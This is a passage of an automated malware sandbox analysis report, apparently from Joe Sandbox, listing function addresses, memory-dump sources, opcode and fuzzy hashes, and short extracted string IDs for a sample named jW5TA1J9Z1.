                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80503cb7c17ca98b8fa3f46ff94eab293af7212b4d792807daab9d84e3e9fdcc
                                                                      • Instruction ID: fb8f9e5aeaa026f58d347998d534794e003fea41918c409a669dd450dc8c6b24
                                                                      • Opcode Fuzzy Hash: 80503cb7c17ca98b8fa3f46ff94eab293af7212b4d792807daab9d84e3e9fdcc
                                                                      • Instruction Fuzzy Hash: F1310461A1A5495FF798BB3C805A679BBD1EF9A315B1444FAD44EC32E3CE18AC458280
                                                                      Function 00007FFAACCE116D Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6a9626313b9a37224049bc251445cccab7de396b634c8cd1e85f1b4483366c3
                                                                      • Instruction ID: da59166e60682aa78ad24e8de0346ff85e1fb1925f85a3736bfcd52bb861e79e
                                                                      • Opcode Fuzzy Hash: a6a9626313b9a37224049bc251445cccab7de396b634c8cd1e85f1b4483366c3
                                                                      • Instruction Fuzzy Hash: 36316D70A0960A8FEB45EB68C855AB977F0FF5A301F4545BAD00ED71A3DB39E944CB80
                                                                      Function 00007FFAACCE0C25 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb5117bded072c24c2a58786767df0ba5ecdb77c15a16dd79370442d7ec086c8
                                                                      • Instruction ID: 0f1c366c297c29206a8f84375e873ae1c63494457a94d616de3c3c4d25f6accf
                                                                      • Opcode Fuzzy Hash: eb5117bded072c24c2a58786767df0ba5ecdb77c15a16dd79370442d7ec086c8
                                                                      • Instruction Fuzzy Hash: 2231B375E0D64ADEF702AB7898051EC7BA0EF43325F5485B6D00C8A1D3DB38A54A97C2
                                                                      Function 00007FFAACCE69E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c669d506c9ceaa860b2f00855e05094269a2e8f156d849f2c2a5fcf2b346b2f3
                                                                      • Instruction ID: c85dc4bbc488b329feea93d34b6dd626b63ba68b0275e1125edaafc4eeaf3ea3
                                                                      • Opcode Fuzzy Hash: c669d506c9ceaa860b2f00855e05094269a2e8f156d849f2c2a5fcf2b346b2f3
                                                                      • Instruction Fuzzy Hash: F521EC74D6856DCFEBA5DF04C4547A9B3E1FB59314F1085AAC40EA3291CB79AEC4CB80
                                                                      Function 00007FFAACCE0C38 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 019c55516a5fb0e93f2b8cc41c3225626ce307fa5672b818ec7b109ba4429b2d
                                                                      • Instruction ID: 464e664fc78375ce447cc0a20690461eb6a25c3832bf03e11b64ca18255a7d95
                                                                      • Opcode Fuzzy Hash: 019c55516a5fb0e93f2b8cc41c3225626ce307fa5672b818ec7b109ba4429b2d
                                                                      • Instruction Fuzzy Hash: F3118E35A0D649DFE702AF74D8411AD7BB0EF43321F0485B2C048DB292E638A64A97C1
                                                                      Function 00007FFAACCE0C40 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 284e3a0e2975cf4d7747f4266614f34d0db9b3adbc9a4d222918d863490e75aa
                                                                      • Instruction ID: 559e8200d32fba47bcea54d0e54095de2e08b62fd3f48650c16c76608ab99dd8
                                                                      • Opcode Fuzzy Hash: 284e3a0e2975cf4d7747f4266614f34d0db9b3adbc9a4d222918d863490e75aa
                                                                      • Instruction Fuzzy Hash: 30018035A0D649DFE702EF74D8411AD7BB0EF43310F0085B6C048DB292D638A6499BC1
                                                                      Function 00007FFAACCE0C48 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20ffc8bfeaca3cfe01e7a6c83d67fbf9fead3419de6c704ffe1a10a1fe7cb1b5
                                                                      • Instruction ID: b022aef07ab0ebcabaa058b90c7396bcf7de86aa32b1ceb78655bf722615cac4
                                                                      • Opcode Fuzzy Hash: 20ffc8bfeaca3cfe01e7a6c83d67fbf9fead3419de6c704ffe1a10a1fe7cb1b5
                                                                      • Instruction Fuzzy Hash: 1C015E3590D249DFE701EF74C8401AD7BB0AF43314F1481F6C048DB2A2E6389649D7C1
                                                                      Function 00007FFAACCE0B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: e26f1ad688af2ff6bcde2cb7ff943fcf42d89ee0a98b6ba38168468f692843bc
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: ABD012345668098FD650EB28D995494BA90FB0A214B8901D4D40CC7162D3569894C741
                                                                      Function 00007FFAACCE06A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: b9cd538452cd8187eb576328b606be5ab1093c5f56132d6a2d5f3d081cc30ab6
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: FEC08C00E4B40BA0BC043F6E24420BCA1049FC7210FD08032C80C400C29E0DE0CE21DA
                                                                      Function 00007FFAACCE12B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 33f5999fe3aba714cb4d4c776e3d9ed04b95e3bfb572dec1c2cdb0ba3c69b966
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: 57C04C345518098FD958EB29C88591477A0FB1A215BD61090E40DC7171D659DCD6C785
                                                                      Function 00007FFAACCE3416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bbb1622baf87378825684b1e0ac8033fe83c1211405ba8538f1848a6f14f68b
                                                                      • Instruction ID: b0ed4157cdc92b5e82bf79d3a860bb620f8ebd3b483271a06b922bdc4c173440
                                                                      • Opcode Fuzzy Hash: 5bbb1622baf87378825684b1e0ac8033fe83c1211405ba8538f1848a6f14f68b
                                                                      • Instruction Fuzzy Hash: 06C04C41E1986696F255A324C42577E4446DF45618F9648B5E00E873DADE0CDB5202C7
                                                                      Function 00007FFAACCE06C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 9b957212e913c6537878f53a7468674f671df165481c87bee4f4294225106780
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: AFB01210C9740F40BC083F7A184207470405F47100FC04070D40C40086994D909C12D6
                                                                      Function 00007FFAACCE3A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: c0d14ca21d7e086e8579ee78c64c833a208e533336c4d5e775cea5a9e847db5f
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 02C09B11D1D155C1F7255B3044051FD71555F5B304F46C571C04E57082DF2CD55956C1

                                                                      Non-executed Functions

                                                                      Function 00007FFAAD0DA69E Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X
                                                                      • API String ID: 0-3240521626
                                                                      • Opcode ID: 0493098c4c2cb61b20de84f808158248c223561762e4efbf368a59486ff00865
                                                                      • Instruction ID: f76f845af044c506ec4ccf86ef7b8e4e3d4f43609b69933170e2e3c526d550e7
                                                                      • Opcode Fuzzy Hash: 0493098c4c2cb61b20de84f808158248c223561762e4efbf368a59486ff00865
                                                                      • Instruction Fuzzy Hash: 76515C70A04509CFEB48EB68C099ABD77B2FF49314F40457AD05AEB2A1CF35A885CB80
                                                                      Function 00007FFAACCE09B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction ID: 7e394b1f60bb90635bca988382ec51b614ad11a7ea6eb353932f3f95e4ffb409
                                                                      • Opcode Fuzzy Hash: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction Fuzzy Hash: 3551D4C3A0956759E21237FDB40A8FC6FC4DF82375B4896B7E04C890938F59A0C682E9

                                                                      Executed Functions

                                                                      Function 00007FFAAB440D4C Relevance: 6.5, Strings: 5, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: 1af5650db3944f28fa8e862fdf9f985f50f0ddadf3094e51e05b28015fcbf4f2
                                                                      • Instruction ID: 7167ea53f7da72f596444bf5b65bcee9049837ac8b20c00f56c66d011cae0b1d
                                                                      • Opcode Fuzzy Hash: 1af5650db3944f28fa8e862fdf9f985f50f0ddadf3094e51e05b28015fcbf4f2
                                                                      • Instruction Fuzzy Hash: A39108B6A18A898FE749EF68C8657E97FE5FB96350F4440BEC04DD73D2CA7814248780
                                                                      Function 00007FFAAB87A8A7 Relevance: 5.6, Strings: 4, Instructions: 623COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: b43$r63$r63$r63
                                                                      • API String ID: 0-2169701798
                                                                      • Opcode ID: 1dbac04eac411f8f9ab1ba5d53e38f341c85a870058d06f3087cedcf34eaaf1e
                                                                      • Instruction ID: 469380bd8ca4aee1211dab4cc3272b28cd28c9074e52745cdd5f056f029f0154
                                                                      • Opcode Fuzzy Hash: 1dbac04eac411f8f9ab1ba5d53e38f341c85a870058d06f3087cedcf34eaaf1e
                                                                      • Instruction Fuzzy Hash: 82320971D0D689CFDB59DB68C4956A87BB1EF5A344F0480FEC00DD72A2DA397989CB80
                                                                      Function 00007FFAAB471945 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: fe14171689ba1c34e93771c3cd4cca477db38d3fa10d9e1b050f63d38190c0c7
                                                                      • Instruction ID: b4a25277f120321be561f87954bde29ef8049fb884c282553363e94268f034b6
                                                                      • Opcode Fuzzy Hash: fe14171689ba1c34e93771c3cd4cca477db38d3fa10d9e1b050f63d38190c0c7
                                                                      • Instruction Fuzzy Hash: 99C1BC62A2D6964BE31D4B284C860B577D6EBD3241B18C67DD8DFC7097F928E84BC2C1
                                                                      Function 00007FFAAB833312 Relevance: 5.3, Strings: 4, Instructions: 321COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$r63$r63$r63
                                                                      • API String ID: 0-3582378960
                                                                      • Opcode ID: 794235a04cf9a6d729d6adb3665c6bf83aede096daf19294b77064811d49c4ea
                                                                      • Instruction ID: 6ea46a045e3ee2d8a06eb8f245a84e51ec0fef11852ec7f7bc19ad65fc21918d
                                                                      • Opcode Fuzzy Hash: 794235a04cf9a6d729d6adb3665c6bf83aede096daf19294b77064811d49c4ea
                                                                      • Instruction Fuzzy Hash: CCB1C27090EA469FE749DB28C0916A4B7A1FF5A300F5491BDD04EC7AD6DB28F855CBC0
                                                                      Function 00007FFAAB47EF25 Relevance: 5.3, Strings: 4, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5K_H$r63$r63$r63
                                                                      • API String ID: 0-3436917211
                                                                      • Opcode ID: 993c63de3edd65ffd8c2f314ce5cd5096f064faec89ff2dc63bc4a30a3755ddf
                                                                      • Instruction ID: 68194b57e98f53e4f5533c10a8aa837bd6d6b6b71bcd8c593346c1aaecb9f9bf
                                                                      • Opcode Fuzzy Hash: 993c63de3edd65ffd8c2f314ce5cd5096f064faec89ff2dc63bc4a30a3755ddf
                                                                      • Instruction Fuzzy Hash: 38811571A1DAC98FDB85DB68C8651BD7BE1EF9A340F0481BAD04DD32A2CA245C45C792
                                                                      Function 00007FFAAB47C037 Relevance: 4.3, Strings: 3, Instructions: 538COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (06$(06$r63
                                                                      • API String ID: 0-3866029006
                                                                      • Opcode ID: 6d7728d7ef71091f5b1822b6bb22f8eb2943879d0139857cf2371310a585f32e
                                                                      • Instruction ID: 71e111b841e65eaf38a81f10ae97bf76cc0647ee961dd6963dfd4ec056acea72
                                                                      • Opcode Fuzzy Hash: 6d7728d7ef71091f5b1822b6bb22f8eb2943879d0139857cf2371310a585f32e
                                                                      • Instruction Fuzzy Hash: 30E16922A0DE4A8FE798DB2CD495AB537D1EFA935070442BAC04EC71A7DD18EC89C3C1
                                                                      Function 00007FFAAB838AAF Relevance: 4.2, Strings: 3, Instructions: 445COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$b43$r63
                                                                      • API String ID: 0-2976439527
                                                                      • Opcode ID: babe24880be813681b8745d1f30cd815b50292f563fb1aadb4bce9039c0e12ac
                                                                      • Instruction ID: e9a1f16e9ecd143d217ba2904ac10b6d539f8de00d4541e533f8d4579a686ddd
                                                                      • Opcode Fuzzy Hash: babe24880be813681b8745d1f30cd815b50292f563fb1aadb4bce9039c0e12ac
                                                                      • Instruction Fuzzy Hash: B9F19D74919656CFEB58DF18C4D06B43BA1FF59300F5485FDC84E8B69ACA38B885CB81
                                                                      Function 00007FFAAB83E592 Relevance: 4.1, Strings: 3, Instructions: 321COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63$r63
                                                                      • API String ID: 0-1480572877
                                                                      • Opcode ID: 9ee0be43610e2d969e19dc760bd49b72a385e295d1d6c4bbdae1143386d8edfa
                                                                      • Instruction ID: 8bc6542b40301fd42ed5400bb96059968fd5833fe7ab57de0de4c2330148026f
                                                                      • Opcode Fuzzy Hash: 9ee0be43610e2d969e19dc760bd49b72a385e295d1d6c4bbdae1143386d8edfa
                                                                      • Instruction Fuzzy Hash: 6AB1D230A0AA46CFE749DB28C0906B4B7A1FF59341F5485BDD04EC7AD6DB28B856CBD0
                                                                      Function 00007FFAAB838362 Relevance: 4.1, Strings: 3, Instructions: 319COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63$r63
                                                                      • API String ID: 0-1480572877
                                                                      • Opcode ID: 65411b98a772c77837172e9f67e7b86af8fdd75ae05819933af60c22bb2a5897
                                                                      • Instruction ID: b3cf9bdc3e21881924006851975ce43b39a0964fae2382d3ad138d105402d648
                                                                      • Opcode Fuzzy Hash: 65411b98a772c77837172e9f67e7b86af8fdd75ae05819933af60c22bb2a5897
                                                                      • Instruction Fuzzy Hash: 5AB1F57460AA468FE349DB28C0946A4BBA1FF5A340F4481BDD04EC7AD6DB28F895C7C0
                                                                      Function 00007FFAAB833A58 Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$b43$r63
                                                                      • API String ID: 0-2976439527
                                                                      • Opcode ID: 8564295a96dc97f54eb156df778ab85d89d24c6d9597f0043b809a2751f3d989
                                                                      • Instruction ID: 601da59d4d7a40692addf4174d303b43515e1f26d5dea64cde7a70875666e014
                                                                      • Opcode Fuzzy Hash: 8564295a96dc97f54eb156df778ab85d89d24c6d9597f0043b809a2751f3d989
                                                                      • Instruction Fuzzy Hash: 6C91B43091D65ACFEB59DB1CC4946B97BA1FF5A300F5485F9C04ECB1DACA38B8498B81
                                                                      Function 00007FFAAB8337E8 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $W$r63
                                                                      • API String ID: 0-3993714074
                                                                      • Opcode ID: cc8091d0727056f7968fbf28af878e95f2c84123745507e210aeeaf499276f3d
                                                                      • Instruction ID: 8566be60574d9fe87aaf289a1d658b99d01f51bbfbc39db1e8076be6c9fd3fe0
                                                                      • Opcode Fuzzy Hash: cc8091d0727056f7968fbf28af878e95f2c84123745507e210aeeaf499276f3d
                                                                      • Instruction Fuzzy Hash: 3C515C71E0960ADBDB59DBA8C4515FDB7B1FF4A340F1081BAC00EE72D6CA382909CB91
                                                                      Function 00007FFAAB83CC51 Relevance: 3.2, Strings: 2, Instructions: 671COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0#=$p]=
                                                                      • API String ID: 0-2035564594
                                                                      • Opcode ID: aa67c9650e7646567caadbc0013acadec1085388bb05106cca6ca41b1402ba08
                                                                      • Instruction ID: 2050fd24652a4df5aadde31ed03edd46ad7bebf3c0e84addd63a225df77c8814
                                                                      • Opcode Fuzzy Hash: aa67c9650e7646567caadbc0013acadec1085388bb05106cca6ca41b1402ba08
                                                                      • Instruction Fuzzy Hash: 69228231A19A19CFDB98DB1CC895AB877E1FF59350B1481B9D00EC72E2DE25BC56CB80
                                                                      Function 00007FFAAB83C7DB Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$/3
                                                                      • API String ID: 0-1731019736
                                                                      • Opcode ID: add4889c4bdfe2b0c586cd444e2ac8b71a6fa1c13c2119ef178938d7eb92a6bd
                                                                      • Instruction ID: cf33c2c99ffbdb72abb421346d11b2fb5f44e7d60994a1571b3354dec1aecb73
                                                                      • Opcode Fuzzy Hash: add4889c4bdfe2b0c586cd444e2ac8b71a6fa1c13c2119ef178938d7eb92a6bd
                                                                      • Instruction Fuzzy Hash: 7C71D03191A64EDEEB54DB68C4546BDBBB0FF4A380F1045BAD00ED72E1DE287949DB80
                                                                      Function 00007FFAAB83EA68 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63
                                                                      • API String ID: 0-3997696496
                                                                      • Opcode ID: 4caa31dcf75f3dcd7f38449bf07bcbc85eea6b7af3362687d0f45e24b45a85c0
                                                                      • Instruction ID: 18d1a93d592c5947f78a0beca15a9846213255cbca5d81c6a3e00235de7572c1
                                                                      • Opcode Fuzzy Hash: 4caa31dcf75f3dcd7f38449bf07bcbc85eea6b7af3362687d0f45e24b45a85c0
                                                                      • Instruction Fuzzy Hash: BF519E71D0A64ADFDB59DBA8C4555BDBBB1FF59341F1080BAD00EE72D2CA382809CB90
                                                                      Function 00007FFAAB838848 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
